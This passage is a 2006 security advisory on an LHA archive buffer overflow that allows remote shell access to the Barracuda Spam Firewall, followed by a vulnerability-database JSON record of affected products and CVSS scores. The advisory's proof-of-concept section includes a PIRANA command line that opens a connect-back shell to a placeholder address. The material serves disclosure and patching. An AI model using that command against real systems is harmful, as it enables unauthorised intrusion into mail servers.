. Topic: Barracuda LHA archiver security bug leads to remote compromise
Announced: 2006-04-03 Product: Barracuda Spam Firewall Vendor: http://www.barracudanetworks.com/ Impact: Remote shell access Affected product: Barracuda with firmware < 3.3.03.022 AND spamdef < 3.0.10045 Credits: Jean-S\xe9bastien Guay-Leroux CVE ID: CVE-2004-0234
I. BACKGROUND
The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection:
- Anti-spam
- Anti-virus
- Anti-spoofing
- Anti-phishing
- Anti-spyware (Attachments)
- Denial of Service
II. DESCRIPTION
When building a special LHA archive with long filenames in it, it is possible to overflow a buffer on the stack used by the program and seize control of the program.
Since this component is used when scanning an incoming email, remote compromise is possible by sending a simple email with the specially crafted LHA archive attached to the Barracuda Spam Firewall.
You do NOT need to have remote administration access (on port 8000) for successfull exploitation.
For further informations about the details of the bugs, you can consult OSVDB
5753 and #5754 .
III. IMPACT
Gain shell access to the remote Barracuda Spam Firewall
IV. PROOF OF CONCEPT
Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the LHA vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \ -p 1234 -z -c 1 -d 1
V. SOLUTION
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045, available March 24th 2006.
They also published an official patch in firmware #3.3.03.022, available April 3rd 2006.
It is recommended to update to firmware #3.3.03.022 .
VI. CREDITS
Ulf Harnhammar who found the original LHA flaw.
Jean-S\xe9bastien Guay-Leroux who conducted further research on the bug and produced exploitation plugin for the PIRANA framework.
VII. REFERENCES
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234
VIII. HISTORY
2006-03-02 : Disclosure of vulnerability to Barracuda Networks 2006-03-02 : Acknowledgement of the problem 2006-03-24 : Problem fixed 2006-04-03 : Advisory disclosed to public
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200408-0140",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.6,
"vendor": "f secure",
"version": "4.7"
},
{
"model": "winzip",
"scope": "eq",
"trust": 1.3,
"vendor": "winzip",
"version": "9.0"
},
{
"model": "cgpmcafee",
"scope": "eq",
"trust": 1.3,
"vendor": "stalker",
"version": "3.2"
},
{
"model": "propack",
"scope": "eq",
"trust": 1.3,
"vendor": "sgi",
"version": "3.0"
},
{
"model": "propack",
"scope": "eq",
"trust": 1.3,
"vendor": "sgi",
"version": "2.4"
},
{
"model": "winrar",
"scope": "eq",
"trust": 1.3,
"vendor": "rarlab",
"version": "3.20"
},
{
"model": "internet gatekeeper",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.32"
},
{
"model": "internet gatekeeper",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.31"
},
{
"model": "f-secure for firewalls",
"scope": "eq",
"trust": 1.3,
"vendor": "f secure",
"version": "6.20"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.13"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.11"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.10"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.8"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.7"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.6"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.5"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.4"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3.3"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.3"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.2"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.1"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.3,
"vendor": "clearswift",
"version": "4.0"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.52"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.60"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2004"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "1.14i-9"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2003"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.5"
},
{
"model": "fedora core",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "core_1.0"
},
{
"model": "mailsweeper",
"scope": "eq",
"trust": 1.0,
"vendor": "clearswift",
"version": "4.3.6_sp1"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.5"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "f-secure anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "6.21"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "tsugio okamoto",
"version": "1.17"
},
{
"model": "f-secure personal express",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "4.6"
},
{
"model": "f-secure internet security",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2004"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "tsugio okamoto",
"version": "1.15"
},
{
"model": "f-secure internet security",
"scope": "eq",
"trust": 1.0,
"vendor": "f secure",
"version": "2003"
},
{
"model": "lha",
"scope": "eq",
"trust": 1.0,
"vendor": "tsugio okamoto",
"version": "1.14"
},
{
"model": "lha for unix",
"scope": "lte",
"trust": 0.8,
"vendor": "lha for unix",
"version": "1.17"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (ws)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (ws)"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "9"
},
{
"model": "linux advanced workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1"
},
{
"model": "linux i686",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.3"
},
{
"model": "lha-1.14i-9.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "hat fedora core1",
"scope": null,
"trust": 0.3,
"vendor": "red",
"version": null
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.17"
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.15"
},
{
"model": "s.k. lha",
"scope": "eq",
"trust": 0.3,
"vendor": "mr",
"version": "1.14"
},
{
"model": "webshield smtp",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5"
},
{
"model": "webshield appliances",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan professional",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan for netapp",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan enterprise i",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan command line",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "9.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "8.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.1"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "6.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5.1"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.5"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.0.3"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "3.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2.0"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "1.0"
},
{
"model": "virex",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "securityshield for microsoft isa server",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "portalshield for microsoft sharepoint",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "netshield for netware",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "managed virusscan",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "linuxshield",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for mail servers with epo",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for lotus domino",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "groupshield for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.5"
},
{
"model": "asap virusscan",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "0"
},
{
"model": "active virus defense smb edition",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "active threat protection",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "active mail protection",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.7"
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.6"
},
{
"model": "personal express",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.5"
},
{
"model": "internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2004"
},
{
"model": "internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2003"
},
{
"model": "anti-virus for workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for windows servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for windows servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for samba servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.60"
},
{
"model": "anti-virus for ms exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "6.21"
},
{
"model": "anti-virus for mimesweeper",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.42"
},
{
"model": "anti-virus for mimesweeper",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.41"
},
{
"model": "anti-virus for linux workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux workstations",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus for linux servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux servers",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus for linux gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.52"
},
{
"model": "anti-virus for linux gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "4.51"
},
{
"model": "anti-virus client security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.52"
},
{
"model": "anti-virus client security",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "5.50"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2004"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "2003"
},
{
"model": "mailsweeper sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "clearswift",
"version": "4.3.6"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.18"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.17"
},
{
"model": "networks barracuda spam firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.03.022"
}
],
"sources": [
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_workstations:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:workstations:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:mimesweeper:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_internet_security:2003:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_internet_security:2004:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sgi:propack:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.6_sp1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_gateways:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:windows_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.42:*:workstations:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_personal_express:4.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:stalker:cgpmcafee:3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:2003:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.52:*:linux_workstations:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.60:*:samba_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.5:*:client_security:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.52:*:client_security:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.15:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:tsugio_okamoto:lha:1.17:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:clearswift:mailsweeper:4.3.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:2004:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:4.51:*:linux_gateways:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:mimesweeper:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:5.41:*:windows_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_anti-virus:6.21:*:ms_exchange:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:f-secure:f-secure_for_firewalls:6.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rarlab:winrar:3.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:redhat:lha:1.14i-9:*:i386:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:winzip:winzip:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:redhat:fedora_core:core_1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ulf Harnhammar\u203b ulfh@update.uu.se\u203bJean-S\u00e9bastien Guay-Leroux\u203b jean-sebastien@guay-leroux.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0234",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2004-0234",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-8664",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0234",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200408-202",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-8664",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. \nThe first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. \nThe second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. \n**NOTE: 